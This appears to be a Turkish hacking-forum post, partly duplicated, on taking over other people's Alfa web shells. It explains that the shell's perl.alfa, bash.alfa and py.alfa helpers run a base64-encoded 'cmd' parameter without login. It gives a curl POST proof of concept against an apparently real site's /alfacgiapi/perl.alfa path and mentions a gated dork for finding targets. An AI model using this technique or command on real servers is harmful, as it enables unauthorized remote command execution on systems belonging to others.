Bu bi tık bir başkasının shell ine çökmek diyebiliriz.En popüler shell olan Alfa shell de RCE alabiliyoruz ve shell e giriş yapmadan komut çalıştırmamız mümkün hale geliyor.Yani şifreli falan olması bizim ipimizde değil
Tabi bunun için temel şartlar ;
# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa
... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal
kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.
[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum
| ls -la
| base64 formatı : bHMgLWxh
ve curl ü kulllanarak post isteği yapıyorum:
ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış
Tabi bunun için temel şartlar ;
# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa
... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal
kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
Hidden content
Bu içeriği görebilmeniz için bu konuya cevap vermeniz gerekmektedir.
Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.
[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum
| ls -la
| base64 formatı : bHMgLWxh
ve curl ü kulllanarak post isteği yapıyorum:
Kod:
#$ curl -d "cmd=bHMgLWxh" -X POST http://benekonomistim.com/alfacgiapi/perl.alfa
ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış